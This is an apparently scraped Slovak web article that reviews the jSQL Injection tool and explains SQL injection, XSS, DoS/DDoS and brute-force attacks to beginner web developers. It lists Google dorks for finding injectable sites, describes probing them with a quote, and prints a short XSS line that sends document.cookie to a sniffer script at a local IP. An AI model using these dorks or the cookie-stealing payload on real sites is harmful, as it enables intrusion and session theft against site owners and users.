jSQL Injection je dobrý a výkonný nástroj na vyhľadávanie a následné použitie injekcií SQL, ktoré sa nachádzajú na webových stránkach. Jeho nesporné výhody: jednoduché použitie, vstavané súvisiace funkcie. jSQL Injection môže byť najlepším priateľom začiatočníka pri analýze webových stránok.

Medzi nedostatky by som poznamenal nemožnosť editácie databáz (aspoň ja som túto funkcionalitu nenašiel). Ako pri všetkých nástrojoch GUI, jednu z nevýhod tohto programu možno pripísať jeho nemožnosti použiť v skriptoch. Napriek tomu je v tomto programe možná aj určitá automatizácia - vďaka vstavanej funkcii hromadnej kontroly stránok.

Program jSQL Injection sa používa oveľa pohodlnejšie ako sqlmap. Ale sqlmap podporuje viac typov SQL injekcií, má možnosti pre prácu so súborovými firewallmi a niektoré ďalšie funkcie.

Zrátané a podčiarknuté: jSQL Injection je najlepší priateľ začínajúceho hackera.

Pomoc pre tento program v Kali Linux Encyklopédii nájdete na tejto stránke: http://kali.tools/?p=706

Rozhodol som sa trochu porozprávať o informačnej bezpečnosti. Článok bude užitočný pre začínajúcich programátorov a tých, ktorí sa práve začali zaoberať vývojom Frontendu. Aký je problém?

Mnoho začínajúcich vývojárov sa tak nechá uniesť písaním kódu, že úplne zabudne na bezpečnosť svojej práce. A čo je najdôležitejšie, zabúdajú na také zraniteľnosti, akými sú SQL a XXS dotazy. Tiež prichádzajú s jednoduchými heslami pre svoje administratívne panely a sú vystavené hrubej sile. Aké sú tieto útoky a ako sa im môžete vyhnúť?

SQL injekcia

SQL injection je najbežnejší typ útoku na databázu, ktorý sa vykonáva počas dotazu SQL pre konkrétny DBMS. Takýmito útokmi trpí mnoho ľudí a dokonca aj veľké spoločnosti. Dôvodom je chyba vývojára pri písaní databázy a striktne povedané SQL dotazov.

Útok SQL injection je možný z dôvodu nesprávneho spracovania vstupných údajov použitých v SQL dotazoch. Ak je útok hackera úspešný, riskujete stratu nielen obsahu databáz, ale aj hesiel a protokolov administratívneho panela. A tieto údaje budú stačiť na úplné ovládnutie stránky alebo na jej nezvratné úpravy.

Útok je možné úspešne reprodukovať v skriptoch napísaných v PHP, ASP, Perl a ďalších jazykoch. Úspešnosť takýchto útokov závisí viac od toho, aký DBMS sa používa a ako je implementovaný samotný skript. Na svete existuje veľa zraniteľných stránok pre SQL injekcie. Dá sa to ľahko overiť. Stačí zadať „dorks“ - to sú špeciálne dopyty na vyhľadávanie zraniteľných stránok. Tu sú niektoré z nich:

  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?category=
  • inurl:article.php?ID=
  • inurl:play_old.php?id=
  • inurl:declaration_more.php?decl_id=
  • inurl:pageid=
  • inurl:games.php?id=
  • inurl:page.php?file=
  • inurl:newsDetail.php?id=
  • inurl:gallery.php?id=
  • inurl:article.php?id=

Ako ich používať? Stačí ich zadať do vyhľadávača Google alebo Yandex. Vyhľadávač vám poskytne nielen zraniteľnú stránku, ale aj stránku o tejto zraniteľnosti. Tým sa však nezastavíme a uistíme sa, že stránka je skutočne zraniteľná. Stačí, ak za hodnotu „id=1“ vložíte jednu úvodzovku „“. Niečo také:

  • inurl:games.php?id=1'

A stránka nám vypíše chybu o SQL dotaze. Čo náš hacker potrebuje ďalej?

A potom potrebuje práve tento odkaz na chybovú stránku. Potom práca na zraniteľnosti vo väčšine prípadov prebieha v distribúcii "Kali linux" s jej nástrojmi pre túto časť: zavedenie injekčného kódu a vykonanie potrebných operácií. Ako sa to stane, vám nemôžem povedať. Informácie o tom však nájdete na internete.

XSS útok

Tento typ útoku sa vykonáva na súbory cookie. Používatelia ich zase radi ukladajú. Prečo nie? Čo by sme bez nich robili? Koniec koncov, vďaka súborom cookie nemusíme stokrát zadávať heslo pre Vk.com alebo Mail.ru. A je málo tých, ktorí ich odmietajú. Na internete sa však pre hackerov často objavuje pravidlo: koeficient pohodlnosti je priamo úmerný koeficientu neistoty.

Na implementáciu XSS útoku potrebuje náš hacker znalosť JavaScriptu. Jazyk je na prvý pohľad veľmi jednoduchý a neškodný, pretože nemá prístup k počítačovým zdrojom. Hacker môže pracovať iba s JavaScriptom v prehliadači, ale to stačí. Koniec koncov, hlavnou vecou je zadať kód na webovú stránku.

Nebudem podrobne hovoriť o procese útoku. Poviem vám len základy a význam toho, ako sa to deje.

Hacker môže pridať kód JS do nejakého fóra alebo knihy návštev:

document.location.href =”http://192.168.1.7/sniff.php?test”

Skripty nás presmerujú na infikovanú stránku, kde sa vykoná kód: či už je to sniffer, nejaký druh úložiska alebo exploit, ktorý nejakým spôsobom ukradne naše cookies z vyrovnávacej pamäte.

Prečo JavaScript? Pretože JavaScript je skvelý pri spracovávaní webových požiadaviek a má prístup k súborom cookie. Ak nás ale náš skript zavedie na nejakú stránku, používateľ si to ľahko všimne. Tu hacker využíva prefíkanejšiu možnosť – jednoducho zadá kód do obrázka.

Img=nový obrázok();

Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

Jednoducho vytvoríme obrázok a priradíme mu náš skript ako adresu.

Ako sa pred tým všetkým chrániť? Je to veľmi jednoduché - neklikajte na podozrivé odkazy.

DoS a DDos útoky

DoS (z anglického Denial of Service - odmietnutie služby) je hackerský útok na počítačový systém s cieľom spôsobiť jeho zlyhanie. Ide o vytvorenie podmienok, za ktorých bona fide používatelia systému nemajú prístup k poskytovaným systémovým prostriedkom (serverom), alebo je tento prístup sťažený. Zlyhanie systému môže byť tiež krokom k jeho prevzatiu, ak softvér v núdzovej situácii vyprodukuje akékoľvek kritické informácie: napríklad verziu, časť programového kódu atď. Najčastejšie je to však miera ekonomického tlaku: stratu jednoduchej služby, ktorá generuje príjem. Účty od poskytovateľa alebo opatrenia na zabránenie útoku výrazne zasiahli „cieľ“ vo vrecku V súčasnosti sú najpopulárnejšie útoky DoS a DDoS, pretože umožňujú zlyhať takmer akýkoľvek systém bez zanechania právne významného dôkazu.

Aký je rozdiel medzi útokom DoS a DDos?

DoS je útok navrhnutý premysleným spôsobom. Napríklad, ak server nekontroluje správnosť prichádzajúcich paketov, hacker môže zadať požiadavku, ktorej spracovanie bude trvať večnosť a nebude dostatok času procesora na prácu s inými pripojeniami. V súlade s tým bude klientom odmietnutá služba. Týmto spôsobom však nebude možné preťažiť alebo zakázať veľké známe stránky. Sú vyzbrojené pomerne širokými kanálmi a super výkonnými servermi, ktoré sa s takýmto preťažením bez problémov vyrovnajú.

DDoS je vlastne rovnaký útok ako DoS. Ale ak v DoS existuje jeden paket požiadaviek, potom v DDoS ich môžu byť stovky alebo viac. Dokonca aj supervýkonné servery nemusia byť schopné zvládnuť takéto preťaženie. Uvediem príklad.

DoS útok je, keď s niekým vediete rozhovor, ale potom príde nejaký nevychovaný človek a začne nahlas kričať. Je buď nemožné, alebo veľmi ťažké hovoriť. Riešenie: zavolajte ochranku, ktorá osobu upokojí a vyvedie z priestorov. DDoS útoky sú, keď sa dnu vrúti dav tisícov takýchto nevychovaných ľudí. V tomto prípade ochranka nebude môcť všetkých zviazať a odviesť.

DoS a DDoS sa vykonávajú z počítačov, takzvaných zombie. Ide o počítače používateľov napadnutých hackermi, ktorí ani len netušia, že ich počítač sa zúčastňuje útoku na akýkoľvek server.

Ako sa pred tým chrániť? Vo všeobecnosti v žiadnom prípade. Hackerovi však môžete veci skomplikovať. Aby ste to dosiahli, musíte si vybrať dobrý hosting s výkonnými servermi.

Bruteforce útok

Vývojár môže prísť s množstvom systémov na ochranu pred útokmi, plne si prezrieť skripty, ktoré sme napísali, skontrolovať, či stránka neobsahuje zraniteľné miesta atď. Keď sa ale dostane k poslednému kroku rozloženia webu, a to keď si jednoducho nastaví heslo pre admin panel, na jednu vec môže zabudnúť. Heslo!

Dôrazne sa neodporúča nastaviť jednoduché heslo. Môže to byť 12345, 1114457, vasya111 atď. Neodporúča sa nastavovať heslá kratšie ako 10-11 znakov. V opačnom prípade môžete byť vystavení najčastejšiemu a nekomplikovanému útoku – Brute force.

Brute force je slovníkový útok na vyhľadávanie hesiel pomocou špeciálnych programov. Slovníky môžu byť rôzne: latinské, vyčíslenie podľa čísel, povedzme, do určitého rozsahu, zmiešané (latinka + čísla) a dokonca existujú slovníky s jedinečnými znakmi @#4$%&*~~`’”\ ? atď.

Samozrejme, tomuto typu útoku sa dá ľahko vyhnúť. Stačí si vymyslieť zložité heslo. Aj captcha vás môže zachrániť. Tiež, ak je vaša stránka vytvorená na CMS, veľa z nich zistí tento typ útoku a zablokuje IP. Vždy si musíte pamätať, že čím viac rôznych znakov je v hesle, tým ťažšie je uhádnuť.

Ako fungujú hackeri? Vo väčšine prípadov buď podozrievajú alebo poznajú časť hesla vopred. Je celkom logické predpokladať, že heslo používateľa určite nebude pozostávať z 3 alebo 5 znakov. Takéto heslá vedú k častému hackovaniu. V zásade hackeri berú rozsah 5 až 10 znakov a pridávajú niekoľko znakov, ktoré môžu vopred poznať. Ďalej sa vygenerujú heslá s požadovanými rozsahmi. Linuxová distribúcia Kali má dokonca programy pre takéto prípady. A voilá, útok už nebude trvať dlho, keďže objem slovníka už nie je taký veľký. Okrem toho môže hacker využiť silu grafickej karty. Niektoré z nich podporujú systém CUDA a rýchlosť vyhľadávania sa zvyšuje až 10-krát. A teraz vidíme, že útok takýmto jednoduchým spôsobom je celkom reálny. Nie sú to však len webové stránky, ktoré sú vystavené hrubej sile.

Vážení vývojári, nikdy nezabúdajte na systém informačnej bezpečnosti, pretože dnes veľa ľudí, vrátane štátov, trpí takýmito typmi útokov. Najväčšou zraniteľnosťou je predsa človek, ktorý sa vie vždy niekde rozptýliť alebo niečo prehliadnuť. Sme programátori, ale nie naprogramované stroje. Buďte vždy na pozore, pretože strata informácií môže mať vážne následky!

 

Môže byť užitočné prečítať si: